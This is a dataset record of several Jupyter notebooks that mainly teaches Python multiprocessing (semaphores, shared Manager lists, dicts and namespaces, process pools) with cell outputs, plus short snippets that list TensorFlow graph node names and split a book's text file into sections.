A Semaphore is one way to manage those connections.", "_____no_output_____" ] ], [ [ "import random\nimport multiprocessing\nimport time\n\n\nclass ActivePool:\n\n def __init__(self):\n super(ActivePool, self).__init__()\n self.mgr = multiprocessing.Manager()\n self.active = self.mgr.list()\n self.lock = multiprocessing.Lock()\n\n def makeActive(self, name):\n with self.lock:\n self.active.append(name)\n\n def makeInactive(self, name):\n with self.lock:\n self.active.remove(name)\n\n def __str__(self):\n with self.lock:\n return str(self.active)\n\n\ndef worker(s, pool):\n name = multiprocessing.current_process().name\n with s:\n pool.makeActive(name)\n print('Activating {} now running {}'.format(\n name, pool))\n time.sleep(random.random())\n pool.makeInactive(name)\n\n\nif __name__ == '__main__':\n pool = ActivePool()\n s = multiprocessing.Semaphore(3)\n jobs = [\n multiprocessing.Process(\n target=worker,\n name=str(i),\n args=(s, pool),\n )\n for i in range(10)\n ]\n\n for j in jobs:\n j.start()\n\n while True:\n alive = 0\n for j in jobs:\n if j.is_alive():\n alive += 1\n j.join(timeout=0.1)\n print('Now running {}'.format(pool))\n if alive == 0:\n # all done\n break", "Activating 0 now running ['0']\nActivating 1 now running ['0', '1']\nActivating 2 now running ['0', '1', '2']\nActivating 3 now running ['1', '2', '3']\nNow running ['1', '2', '3']\nNow running ['1', '2', '3']\nActivating 4 now running ['1', '2', '4']\nNow running ['1', '2', '3']\nNow running ['1', '2', '3']\nActivating 5 now running ['1', '4', '5']\nNow running ['1', '4', '5']\nNow running ['1', '4', '5']\nActivating 6 now running ['1', '5', '6']\nActivating 7 now running ['1', '6', '7']\nNow running ['1', '4', '5']\nNow running ['1', '6', '7']\nActivating 8 now running ['6', '7', '8']\nActivating 9 now running ['7', '8', '9']\nNow running ['1', '6', '7']\nNow running ['6', '7', '8']\nNow running ['7', '8', '9']\nNow running ['7', '8', '9']\nNow running ['7', '8', '9']\nNow running ['7', '8', '9']\nNow running ['7', '8', '9']\nNow running ['7', '8', '9']\nNow running ['8', '9']\nNow running ['9']\nNow running ['9']\nNow running ['9']\nNow running []\n" ] ], [ [ "## Managing Shared State", "_____no_output_____" ], [ "In the previous example, the list of active processes is maintained centrally in the ActivePool instance via a special type of list object created by a Manager. The Manager is responsible for coordinating shared information state between all of its users.", "_____no_output_____" ] ], [ [ "import multiprocessing\nimport pprint\n\n\ndef worker(d, key, value):\n d[key] = value\n\n\nif __name__ == '__main__':\n mgr = multiprocessing.Manager()\n d = mgr.dict()\n jobs = [\n multiprocessing.Process(\n target=worker,\n args=(d, i, i * 2),\n )\n for i in range(10)\n ]\n for j in jobs:\n j.start()\n for j in jobs:\n j.join()\n print('Results:', d)", "Results: {0: 0, 1: 2, 3: 6, 2: 4, 4: 8, 5: 10, 6: 12, 7: 14, 8: 16, 9: 18}\n" ] ], [ [ "By creating the list through the manager, it is shared and updates are seen in all processes. 
Dictionaries are also supported.", "_____no_output_____" ], [ "## Shared Namespaces", "_____no_output_____" ], [ "In addition to dictionaries and lists, a Manager can create a shared Namespace.", "_____no_output_____" ] ], [ [ "import multiprocessing\n\n\ndef producer(ns, event):\n ns.value = 'This is the value'\n event.set()\n\n\ndef consumer(ns, event):\n try:\n print('Before event: {}'.format(ns.value))\n except Exception as err:\n print('Before event, error:', str(err))\n event.wait()\n print('After event:', ns.value)\n\n\nif __name__ == '__main__':\n mgr = multiprocessing.Manager()\n namespace = mgr.Namespace()\n event = multiprocessing.Event()\n p = multiprocessing.Process(\n target=producer,\n args=(namespace, event),\n )\n c = multiprocessing.Process(\n target=consumer,\n args=(namespace, event),\n )\n\n c.start()\n p.start()\n\n c.join()\n p.join()", "Before event, error: 'Namespace' object has no attribute 'value'\nAfter event: This is the value\n" ] ], [ [ "Any named value added to the Namespace is visible to all of the clients that receive the Namespace instance.", "_____no_output_____" ], [ "**It is important to know that updates to the contents of mutable values in the namespace are not propagated automatically.**", "_____no_output_____" ] ], [ [ "import multiprocessing\n\n\ndef producer(ns, event):\n # DOES NOT UPDATE GLOBAL VALUE!\n ns.my_list.append('This is the value')\n event.set()\n\n\ndef consumer(ns, event):\n print('Before event:', ns.my_list)\n event.wait()\n print('After event :', ns.my_list)\n\n\nif __name__ == '__main__':\n mgr = multiprocessing.Manager()\n namespace = mgr.Namespace()\n namespace.my_list = []\n\n event = multiprocessing.Event()\n p = multiprocessing.Process(\n target=producer,\n args=(namespace, event),\n )\n c = multiprocessing.Process(\n target=consumer,\n args=(namespace, event),\n )\n\n c.start()\n p.start()\n\n c.join()\n p.join()", "Before event: []\nAfter event : []\n" ] ], [ [ "## Process Pools", "_____no_output_____" ], [ "The Pool class can be used to manage a fixed number of workers for simple cases where the work to be done can be broken up and distributed between workers independently. The return values from the jobs are collected and returned as a list. 
The pool arguments include the number of processes and a function to run when starting the task process (invoked once per child).", "_____no_output_____" ] ], [ [ "import multiprocessing\n\n\ndef do_calculation(data):\n return data * 2\n\n\ndef start_process():\n print('Starting', multiprocessing.current_process().name)\n\n\nif __name__ == '__main__':\n inputs = list(range(10))\n print('Input :', inputs)\n\n builtin_outputs = map(do_calculation, inputs)\n print('Built-in:', [i for i in builtin_outputs])\n\n pool_size = multiprocessing.cpu_count() * 2\n pool = multiprocessing.Pool(\n processes=pool_size,\n initializer=start_process,\n )\n pool_outputs = pool.map(do_calculation, inputs)\n pool.close() # no more tasks\n pool.join() # wrap up current tasks\n\n print('Pool :', pool_outputs)", "Input : [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\nBuilt-in: [0, 2, 4, 6, 8, 10, 12, 14, 16, 18]\nStarting ForkPoolWorker-87\nStarting ForkPoolWorker-86\nStarting ForkPoolWorker-85\nStarting ForkPoolWorker-88\nStarting ForkPoolWorker-89\nStarting ForkPoolWorker-90\nStarting ForkPoolWorker-91\nStarting ForkPoolWorker-92\nStarting ForkPoolWorker-93\nStarting ForkPoolWorker-94\nStarting ForkPoolWorker-95\nStarting ForkPoolWorker-96\nStarting ForkPoolWorker-97\nStarting ForkPoolWorker-98\nStarting ForkPoolWorker-100\nStarting ForkPoolWorker-99\nPool : [0, 2, 4, 6, 8, 10, 12, 14, 16, 18]\n" ] ], [ [ "By default, Pool creates a fixed number of worker processes and passes jobs to them until there are no more jobs. Setting the maxtasksperchild parameter tells the pool to restart a worker process after it has finished a few tasks, preventing long-running workers from consuming ever more system resources.", "_____no_output_____" ] ], [ [ "import multiprocessing\n\n\ndef do_calculation(data):\n return data * 2\n\n\ndef start_process():\n print('Starting', multiprocessing.current_process().name)\n\n\nif __name__ == '__main__':\n inputs = list(range(10))\n print('Input :', inputs)\n\n builtin_outputs = map(do_calculation, inputs)\n print('Built-in:', builtin_outputs)\n\n pool_size = multiprocessing.cpu_count() * 2\n pool = multiprocessing.Pool(\n processes=pool_size,\n initializer=start_process,\n maxtasksperchild=2,\n )\n pool_outputs = pool.map(do_calculation, inputs)\n pool.close() # no more tasks\n pool.join() # wrap up current tasks\n\n print('Pool :', pool_outputs)", "Input : [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\nBuilt-in: <map object at 0x7f430c35dbe0>\nStarting ForkPoolWorker-101\nStarting ForkPoolWorker-102\nStarting ForkPoolWorker-103\nStarting ForkPoolWorker-104\nStarting ForkPoolWorker-105\nStarting ForkPoolWorker-106\nStarting ForkPoolWorker-107\nStarting ForkPoolWorker-108\nStarting ForkPoolWorker-109\nStarting ForkPoolWorker-110\nStarting ForkPoolWorker-111\nStarting ForkPoolWorker-112\nStarting ForkPoolWorker-113\nStarting ForkPoolWorker-114\nStarting ForkPoolWorker-115\nStarting ForkPoolWorker-116\nPool : [0, 2, 4, 6, 8, 10, 12, 14, 16, 18]\n" ] ], [ [ "The pool restarts the workers when they have completed their allotted tasks, even if there is no more work. In this output, eight workers are created, even though there are only 10 tasks, and each worker can complete two of them at a time.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb1cac80a50ac05ff3a0b91121b4c8e4987968ee
17,166
ipynb
Jupyter Notebook
chapter 2/web scraping.ipynb
victorqp/wswp
4a961c5a56db05437f7d682cfece299dced11485
[ "MIT" ]
null
null
null
chapter 2/web scraping.ipynb
victorqp/wswp
4a961c5a56db05437f7d682cfece299dced11485
[ "MIT" ]
null
null
null
chapter 2/web scraping.ipynb
victorqp/wswp
4a961c5a56db05437f7d682cfece299dced11485
[ "MIT" ]
null
null
null
46.901639
273
0.561925
[ [ [ "import urllib.request as urlreq\nimport urllib.error as urlerr\nimport urllib.parse as urlparse\nimport urllib.robotparser as urlrp\nfrom bs4 import BeautifulSoup\nimport re\nimport datetime\nimport time\nimport sys\nsys.path.append('../')\nfrom common.utils import *", "_____no_output_____" ], [ "url = \"http://example.webscraping.com/places/default/view/Argentina-11\"\nhtml = download(url)\nsoup = BeautifulSoup(html, \"lxml\")\ntrs = soup.find_all(attrs={'id':re.compile('places_.*__row')})\nfor tr in trs:\n td = tr.find(attrs={'class':'w2p_fw'})\n value = td.text\n print(value)", "Downloading: http://example.webscraping.com/places/default/view/Argentina-11\n\n2,766,890 square kilometres\n41,343,201\nAR\nArgentina\nBuenos Aires\nSA\n.ar\nARS\nPeso\n54\n@####@@@\n^([A-Z]\\d{4}[A-Z]{3})$\nes-AR,en,it,de,fr,gn\nCL BO UY PY BR \n" ], [ "import lxml.html\n\ntree = lxml.html.fromstring(html)\ntd = tree.cssselect('tr#places_area__row > td.w2p_fw')[0]\narea = td.text_content()\nprint(area)", "2,766,890 square kilometres\n" ], [ "FIELDS = ('area', 'population', 'iso', 'country', 'capital', 'continent',\n 'tld', 'currency_code', 'currency_name', 'phone', 'postal_code_format',\n 'postal_code_regex', 'languages', 'neighbours')\n\ndef re_scraper(html):\n results = {}\n for field in FIELDS:\n results[field] = re.search('<tr id=\"places_%s__row\">.*?<td class=\"w2p_fw\">(.*?)<\\/td>' % field, html.decode()).groups()[0]\n \n return results\n\ndef bs_scraper(html):\n soup = BeautifulSoup(html, \"lxml\")\n results = {}\n for field in FIELDS:\n results[field] = soup.find('table').find('tr', id='places_%s__row' % field).find(\n 'td', class_='w2p_fw').text\n \n return results\n\ndef lxml_scraper(html):\n tree = lxml.html.fromstring(html)\n results = {}\n for field in FIELDS:\n results[field] = tree.cssselect('table > tr#places_%s__row > td.w2p_fw' %\n field)[0].text_content()\n \n return results", "_____no_output_____" ], [ "import time\n\nNUM_ITERATIONS = 1000\n\nfor name, scraper in [('Regular expressions', re_scraper),\n ('BeautifulSoup', bs_scraper),\n ('Lxml', lxml_scraper)]:\n start = time.time()\n for i in range(NUM_ITERATIONS):\n if scraper == re_scraper:\n re.purge()\n result = scraper(html)\n assert(result['area'] == '2,766,890 square kilometres')\n end = time.time()\n print(\"%s: %.2f seconds\" % (name, end-start))", "Regular expressions: 1.61 seconds\nBeautifulSoup: 10.67 seconds\nLxml: 2.07 seconds\n" ], [ "def scrape_callback(url, html):\n if re.search('/view/', url):\n tree = lxml.html.fromstring(html)\n row = [tree.cssselect('table > tr#places_{}__row > td.w2p_fw'.format(field))[0].text_content() for field in FIELDS]\n print(url, row)", "_____no_output_____" ], [ "import csv \n\nclass ScrapeCallback:\n def __init__(self):\n self.writer = csv.writer(open('countries.csv', 'w'))\n self.fields = ('area', 'population', 'iso', 'country', 'capital', 'continent', 'tld', 'currency_code', 'currency_name', 'phone', 'postal_code_format', 'postal_code_regex', 'languages', 'neighbours')\n self.writer.writerow(self.fields)\n\n def __call__(self, url, html):\n if re.search('/view/', url):\n tree = lxml.html.fromstring(html)\n row = []\n for field in self.fields:\n row.append(tree.cssselect('table > tr#places_{}__row > td.w2p_fw'.format(field))[0].text_content())\n self.writer.writerow(row)", "_____no_output_____" ], [ "def link_crawler(seed_url, link_regex, max_depth=2, scrape_callback=None):\n crawl_queue = [seed_url]\n seen = {seed_url:0}\n throttle = Throttle(3)\n user_agent = 'victor'\n rp = 
urlrp.RobotFileParser()\n rp.set_url(\"http://example.webscraping.com/robots.txt\")\n rp.read()\n while crawl_queue:\n url = crawl_queue.pop()\n depth = seen[url]\n if rp.can_fetch(user_agent, url):\n throttle.wait(url)\n html = download(url, user_agent)\n if scrape_callback:\n scrape_callback(url, html)\n if depth != max_depth:\n for link in get_links(html.decode()):\n # skip all login pages\n if re.search('login|register', link):\n continue\n if re.search(link_regex, link):\n # form absolute link\n link = urlparse.urljoin(seed_url, link)\n # check if this link is already seen\n if link not in seen:\n seen[link] = depth + 1\n crawl_queue.append(link)\n else:\n print('blocked by robots.txt, ', url)\n \n return seen", "_____no_output_____" ], [ "all_links = link_crawler('http://example.webscraping.com', '/(index|view)/', scrape_callback=scrape_callback)", "Downloading: http://example.webscraping.com\nDownloading: http://example.webscraping.com/places/default/index/1\nDownloading: http://example.webscraping.com/places/default/index/2\nDownloading: http://example.webscraping.com/places/default/index/0\nDownloading: http://example.webscraping.com/places/default/view/Barbados-20\nhttp://example.webscraping.com/places/default/view/Barbados-20 ['431 square kilometres', '285,653', 'BB', 'Barbados', 'Bridgetown', 'NA', '.bb', 'BBD', 'Dollar', '+1-246', 'BB#####', '^(?:BB)*(\\\\d{5})$', 'en-BB', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Bangladesh-19\nhttp://example.webscraping.com/places/default/view/Bangladesh-19 ['144,000 square kilometres', '156,118,464', 'BD', 'Bangladesh', 'Dhaka', 'AS', '.bd', 'BDT', 'Taka', '880', '####', '^(\\\\d{4})$', 'bn-BD,en', 'MM IN ']\nDownloading: http://example.webscraping.com/places/default/view/Bahrain-18\nhttp://example.webscraping.com/places/default/view/Bahrain-18 ['665 square kilometres', '738,004', 'BH', 'Bahrain', 'Manama', 'AS', '.bh', 'BHD', 'Dinar', '973', '####|###', '^(\\\\d{3}\\\\d?)$', 'ar-BH,en,fa,ur', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Bahamas-17\nhttp://example.webscraping.com/places/default/view/Bahamas-17 ['13,940 square kilometres', '301,790', 'BS', 'Bahamas', 'Nassau', 'NA', '.bs', 'BSD', 'Dollar', '+1-242', '', '', 'en-BS', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Azerbaijan-16\nhttp://example.webscraping.com/places/default/view/Azerbaijan-16 ['86,600 square kilometres', '8,303,512', 'AZ', 'Azerbaijan', 'Baku', 'AS', '.az', 'AZN', 'Manat', '994', 'AZ ####', '^(?:AZ)*(\\\\d{4})$', 'az,ru,hy', 'GE IR AM TR RU ']\nDownloading: http://example.webscraping.com/places/default/view/Austria-15\nhttp://example.webscraping.com/places/default/view/Austria-15 ['83,858 square kilometres', '8,205,000', 'AT', 'Austria', 'Vienna', 'EU', '.at', 'EUR', 'Euro', '43', '####', '^(\\\\d{4})$', 'de-AT,hr,hu,sl', 'CH DE HU SK CZ IT SI LI ']\nDownloading: http://example.webscraping.com/places/default/view/Australia-14\nhttp://example.webscraping.com/places/default/view/Australia-14 ['7,686,850 square kilometres', '21,515,754', 'AU', 'Australia', 'Canberra', 'OC', '.au', 'AUD', 'Dollar', '61', '####', '^(\\\\d{4})$', 'en-AU', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Aruba-13\nhttp://example.webscraping.com/places/default/view/Aruba-13 ['193 square kilometres', '71,566', 'AW', 'Aruba', 'Oranjestad', 'NA', '.aw', 'AWG', 'Guilder', '297', '', '', 'nl-AW,es,en', ' ']\nDownloading: 
http://example.webscraping.com/places/default/view/Armenia-12\nhttp://example.webscraping.com/places/default/view/Armenia-12 ['29,800 square kilometres', '2,968,000', 'AM', 'Armenia', 'Yerevan', 'AS', '.am', 'AMD', 'Dram', '374', '######', '^(\\\\d{6})$', 'hy', 'GE IR AZ TR ']\nDownloading: http://example.webscraping.com/places/default/view/Argentina-11\nhttp://example.webscraping.com/places/default/view/Argentina-11 ['2,766,890 square kilometres', '41,343,201', 'AR', 'Argentina', 'Buenos Aires', 'SA', '.ar', 'ARS', 'Peso', '54', '@####@@@', '^([A-Z]\\\\d{4}[A-Z]{3})$', 'es-AR,en,it,de,fr,gn', 'CL BO UY PY BR ']\nDownloading: http://example.webscraping.com/places/default/view/Antigua-and-Barbuda-10\nhttp://example.webscraping.com/places/default/view/Antigua-and-Barbuda-10 ['443 square kilometres', '86,754', 'AG', 'Antigua and Barbuda', \"St. John's\", 'NA', '.ag', 'XCD', 'Dollar', '+1-268', '', '', 'en-AG', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Antarctica-9\nhttp://example.webscraping.com/places/default/view/Antarctica-9 ['14,000,000 square kilometres', '0', 'AQ', 'Antarctica', '', 'AN', '.aq', '', '', '', '', '', '', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Anguilla-8\nhttp://example.webscraping.com/places/default/view/Anguilla-8 ['102 square kilometres', '13,254', 'AI', 'Anguilla', 'The Valley', 'NA', '.ai', 'XCD', 'Dollar', '+1-264', '', '', 'en-AI', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Angola-7\nhttp://example.webscraping.com/places/default/view/Angola-7 ['1,246,700 square kilometres', '13,068,161', 'AO', 'Angola', 'Luanda', 'AF', '.ao', 'AOA', 'Kwanza', '244', '', '', 'pt-AO', 'CD NA ZM CG ']\nDownloading: http://example.webscraping.com/places/default/view/Andorra-6\nhttp://example.webscraping.com/places/default/view/Andorra-6 ['468 square kilometres', '84,000', 'AD', 'Andorra', 'Andorra la Vella', 'EU', '.ad', 'EUR', 'Euro', '376', 'AD###', '^(?:AD)*(\\\\d{3})$', 'ca', 'ES FR ']\nDownloading: http://example.webscraping.com/places/default/view/American-Samoa-5\nhttp://example.webscraping.com/places/default/view/American-Samoa-5 ['199 square kilometres', '57,881', 'AS', 'American Samoa', 'Pago Pago', 'OC', '.as', 'USD', 'Dollar', '+1-684', '', '', 'en-AS,sm,to', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Algeria-4\nhttp://example.webscraping.com/places/default/view/Algeria-4 ['2,381,740 square kilometres', '34,586,184', 'DZ', 'Algeria', 'Algiers', 'AF', '.dz', 'DZD', 'Dinar', '213', '#####', '^(\\\\d{5})$', 'ar-DZ', 'NE EH LY MR TN MA ML ']\nDownloading: http://example.webscraping.com/places/default/view/Albania-3\nhttp://example.webscraping.com/places/default/view/Albania-3 ['28,748 square kilometres', '2,986,952', 'AL', 'Albania', 'Tirana', 'EU', '.al', 'ALL', 'Lek', '355', '', '', 'sq,el', 'MK GR CS ME RS XK ']\nDownloading: http://example.webscraping.com/places/default/view/Aland-Islands-2\nhttp://example.webscraping.com/places/default/view/Aland-Islands-2 ['1,580 square kilometres', '26,711', 'AX', 'Aland Islands', 'Mariehamn', 'EU', '.ax', 'EUR', 'Euro', '+358-18', '#####', '^(?:FI)*(\\\\d{5})$', 'sv-AX', ' ']\nDownloading: http://example.webscraping.com/places/default/view/Afghanistan-1\nhttp://example.webscraping.com/places/default/view/Afghanistan-1 ['647,500 square kilometres', '29,121,286', 'AF', 'Afghanistan', 'Kabul', 'AS', '.af', 'AFN', 'Afghani', '93', '', '', 'fa-AF,ps,uz-AF,tk', 'TM CN IR TJ PK UZ ']\n" ], [ "all_links = 
link_crawler('http://example.webscraping.com', '/(index|view)/', scrape_callback=ScrapeCallback())", "Downloading: http://example.webscraping.com\nDownloading: http://example.webscraping.com/places/default/index/1\nDownloading: http://example.webscraping.com/places/default/index/2\nDownloading: http://example.webscraping.com/places/default/index/0\nDownloading: http://example.webscraping.com/places/default/view/Barbados-20\nDownloading: http://example.webscraping.com/places/default/view/Bangladesh-19\nDownloading: http://example.webscraping.com/places/default/view/Bahrain-18\nDownloading: http://example.webscraping.com/places/default/view/Bahamas-17\nDownloading: http://example.webscraping.com/places/default/view/Azerbaijan-16\nDownloading: http://example.webscraping.com/places/default/view/Austria-15\nDownloading: http://example.webscraping.com/places/default/view/Australia-14\nDownloading: http://example.webscraping.com/places/default/view/Aruba-13\nDownloading: http://example.webscraping.com/places/default/view/Armenia-12\nDownloading: http://example.webscraping.com/places/default/view/Argentina-11\nDownloading: http://example.webscraping.com/places/default/view/Antigua-and-Barbuda-10\nDownloading: http://example.webscraping.com/places/default/view/Antarctica-9\nDownloading: http://example.webscraping.com/places/default/view/Anguilla-8\nDownloading: http://example.webscraping.com/places/default/view/Angola-7\nDownloading: http://example.webscraping.com/places/default/view/Andorra-6\nDownloading: http://example.webscraping.com/places/default/view/American-Samoa-5\nDownloading: http://example.webscraping.com/places/default/view/Algeria-4\nDownloading: http://example.webscraping.com/places/default/view/Albania-3\nDownloading: http://example.webscraping.com/places/default/view/Aland-Islands-2\nDownloading: http://example.webscraping.com/places/default/view/Afghanistan-1\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1cb4003ec87f1a35975d6450dad8fefb132499
388,447
ipynb
Jupyter Notebook
examples/Tutorial_Disassociation_curve_end_to_end.ipynb
yaoyongxin/qucochemistry
b92384db4a54ec832c0615d252a8ec5ae4c913ef
[ "Apache-2.0" ]
null
null
null
examples/Tutorial_Disassociation_curve_end_to_end.ipynb
yaoyongxin/qucochemistry
b92384db4a54ec832c0615d252a8ec5ae4c913ef
[ "Apache-2.0" ]
null
null
null
examples/Tutorial_Disassociation_curve_end_to_end.ipynb
yaoyongxin/qucochemistry
b92384db4a54ec832c0615d252a8ec5ae4c913ef
[ "Apache-2.0" ]
null
null
null
220.332955
177,909
0.869799
[ [ [ "# End-to-end quantum chemistry VQE using Qu & Co Chemistry\nIn this tutorial we show how to solve the groundstate energy of a hydrogen molecule using VQE, as a function of the spacing between the atoms of the molecule. For a more detailed discussion on MolecularData generation or VQE settings, please refer to our other tutorials. We here focus on the exact UCCSD method, which is the upper bound of a UCCSD-based VQE approach performance. In reality, errors are incurred by Trotterizing the UCC Hamiltonian evolution.", "_____no_output_____" ] ], [ [ "from openfermion.hamiltonians import MolecularData\nfrom qucochemistry.vqe import VQEexperiment\nfrom openfermionpyscf import run_pyscf\nimport numpy as np\n\n#H2 spacing\nspacing =np.array([0.1,0.15,0.2,0.25,0.3,0.4,0.5,0.6,0.7,0.74,0.75,0.8,0.85,0.9,1.0,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8,1.9,2.0,2.2,2.4,2.6,2.8,3.0])\nM=len(spacing)\n\n# Set molecule parameters and desired basis.\nbasis = 'sto-3g'\nmultiplicity = 1\n\n# Set calculation parameters.\nrun_scf = 1\nrun_mp2 = 1\nrun_cisd = 1\nrun_ccsd = 1\nrun_fci = 1\n\nE_fci=np.zeros([M,1])\nE_hf=np.zeros([M,1])\nE_ccsd=np.zeros([M,1])\nE_uccsd=np.zeros([M,1])\nE_uccsd_opt=np.zeros([M,1])\n\nfor i, space in enumerate(spacing):\n #construct molecule data storage object \n geometry = [('H', (0., 0., 0.)), ('H', (0., 0., space))]\n molecule = MolecularData(geometry, basis, multiplicity,description='pyscf_H2_' + str(space*100))\n\n molecule.filename = 'molecules/H2/H2_pyscf_' + str(space)[0] +'_' +str(space)[2:] #location of the .hdf5 file to store the data in\n\n # Run PySCF to add the data.\n molecule = run_pyscf(molecule,\n run_scf=run_scf,\n run_mp2=run_mp2,\n run_cisd=run_cisd,\n run_ccsd=run_ccsd,\n run_fci=run_fci)\n \n vqe = VQEexperiment(molecule=molecule,method='linalg', strategy='UCCSD')\n \n E_uccsd[i]=vqe.objective_function()\n \n vqe.start_vqe()\n \n E_uccsd_opt[i]=vqe.get_results().fun\n \n E_fci[i]=float(molecule.fci_energy)\n E_hf[i]=float(molecule.hf_energy)\n E_ccsd[i]=float(molecule.ccsd_energy)", "_____no_output_____" ] ], [ [ "We compare the results for 5 different strategies: classical HF, CCSD, and FCI, with a quantum unitary variant of CCSD, called UCCSD and its optimized version. In other words, we calculate the Hamiltonian expectation value for a wavefunction which was propagated by a UCCSD ansatz with CCSD amplitudes. Then we initiate an optimization algorithm over these starting amplitudes in order to reach even closer to the true ground state and thus minimizing the energy.\n\nIn essence, with the method='linalg' option, we do not create a quantum circuit, but rather directly take the matrix exponential of the UCC-Hamiltonian. In reality, for a gate-based architecture, one would need to select a Trotterization protocol to execute this action on a QPU, incurring Trotterization errors along the way. 
\n\nWe plot the results below:", "_____no_output_____" ] ], [ [ "%matplotlib notebook\n\nimport matplotlib.pyplot as plt\n\nplt.figure()\nplt.plot(spacing,E_hf,label='HF energy')\nplt.plot(spacing,E_ccsd,label='CCSD energy')\nplt.plot(spacing,E_uccsd,label='UCCSD energy (guess)')\nplt.plot(spacing,E_uccsd_opt,label='UCCSD energy (optim)')\nplt.plot(spacing,E_fci,label='FCI energy')\nplt.xlabel('spacing (Angstrom)')\nplt.ylabel('Energy (Hartree)')\nplt.title('Disassociation curve hydrogen molecule')\nplt.legend()", "_____no_output_____" ], [ "plt.figure()\nplt.semilogy(spacing,np.abs(E_fci-E_hf),label='HF energy')\nplt.semilogy(spacing,np.abs(E_fci-E_ccsd),label='CCSD energy')\nplt.semilogy(spacing,np.abs(E_fci-E_uccsd),label='UCCSD energy (guess)')\nplt.semilogy(spacing,np.abs(E_fci-E_uccsd_opt),label='UCCSD energy (optim)')\nplt.semilogy(spacing,0.0016*np.ones([len(spacing),1]),label='chemical accuracy',linestyle='-.',color='black')\nplt.xlabel('spacing (Angstrom)')\nplt.ylabel('Energy error with FCI (Hartree)')\nplt.title('Error with FCI - Disassociation curve hydrogen molecule')\nplt.legend()", "_____no_output_____" ] ], [ [ "We find that the HF energy is not within chemical accuracy with the FCI energy, while CCSD and UCCSD can reach that level. Clearly, for larger bond distances the approximations are less accurate but still the UCCSD optimization reaches numerical precision accuracy to the ground state. Note that the UCCSD method is not guaranteed to reach this level of accuracy with general molecules; one can experiment with that using this notebook before implementing the UCC in a quantum circuit, which will always perform worse.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ] ]
cb1cb4e55b28dfee01c1b60f32d432e6a76315f1
1,437
ipynb
Jupyter Notebook
logs/Untitled.ipynb
ceevaaa/Universal-Interpreter
e5b4ee87b5c0b2ae6e03f71091dbe2b4e0b68133
[ "Apache-2.0" ]
16
2020-01-14T17:53:13.000Z
2022-01-24T20:55:56.000Z
logs/Untitled.ipynb
ceevaaa/Universal-Interpreter
e5b4ee87b5c0b2ae6e03f71091dbe2b4e0b68133
[ "Apache-2.0" ]
4
2020-03-01T18:18:15.000Z
2022-02-06T17:51:17.000Z
logs/Untitled.ipynb
ceevaaa/Universal-Interpreter
e5b4ee87b5c0b2ae6e03f71091dbe2b4e0b68133
[ "Apache-2.0" ]
4
2020-01-14T17:39:15.000Z
2020-04-25T08:00:37.000Z
20.239437
52
0.487126
[ [ [ "import tensorflow as tf\ngf = tf.GraphDef()\nm_file = open('trained_graph.pb','rb')\ngf.ParseFromString(m_file.read())\n\nwith open('somefile.txt', 'a') as the_file:\n for n in gf.node:\n the_file.write(n.name+'\\n')\n\nfile = open('somefile.txt','r')\ndata = file.readlines()\nprint (\"output name = \")\nprint (data[len(data)-1])\n\nprint (\"Input name = \")\nfile.seek ( 0 )\nprint (file.readline())", "output name = \nfinal_result\n\nInput name = \nDecodeJpeg/contents\n\n" ] ] ]
[ "code" ]
[ [ "code" ] ]
cb1cb5608fc9dddee1a114ca0f07561726e44d01
2,757
ipynb
Jupyter Notebook
textbook_seperation_to_props.ipynb
mmehrani/elements_book
984184a6d417f03815a08106a4d1d6de73d3f937
[ "MIT" ]
null
null
null
textbook_seperation_to_props.ipynb
mmehrani/elements_book
984184a6d417f03815a08106a4d1d6de73d3f937
[ "MIT" ]
null
null
null
textbook_seperation_to_props.ipynb
mmehrani/elements_book
984184a6d417f03815a08106a4d1d6de73d3f937
[ "MIT" ]
null
null
null
19.692857
99
0.439246
[ [ [ "book_names = ['BOOK I.','BOOK II.','BOOK III.','BOOK IV.','BOOK V.','BOOK VI.','BOOK XI.']\nsections = []\nsections.extend(book_names)\nsections.extend(['APPENDIX.','NOTES.'])\nsections", "_____no_output_____" ], [ "# section_names_rep_dict = {}\n# for x in sections:\n# section_names_rep_dict[x] = []\n# section_names_rep_dict", "_____no_output_____" ], [ "book = open('Elements_book_directly_copied.txt','r')\nbook_lines = book.readlines()\n\nfor i in range(len(book_lines)):\n if book_lines[i].replace('\\n','') in sections:\n print(i)\n", "0\n1842\n2739\n4130\n4875\n6447\n8225\n8671\n9107\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code" ] ]
cb1cb666dddcd46e463aec05973c0189d5f0437c
202,351
ipynb
Jupyter Notebook
Machine Learning/Models/Comparing-the-results-of-Decision-Trees-and-Random-Forests-on-LendingClub-dataset.ipynb
KhushMody/Ds-Algo-HacktoberFest
2cb5bdcfcdcb87b67ee31941cc9afc466507a05b
[ "MIT" ]
12
2020-10-04T06:48:29.000Z
2021-02-16T17:54:04.000Z
Machine Learning/Models/Comparing-the-results-of-Decision-Trees-and-Random-Forests-on-LendingClub-dataset.ipynb
KhushMody/Ds-Algo-HacktoberFest
2cb5bdcfcdcb87b67ee31941cc9afc466507a05b
[ "MIT" ]
14
2020-10-04T09:09:52.000Z
2021-10-16T19:59:23.000Z
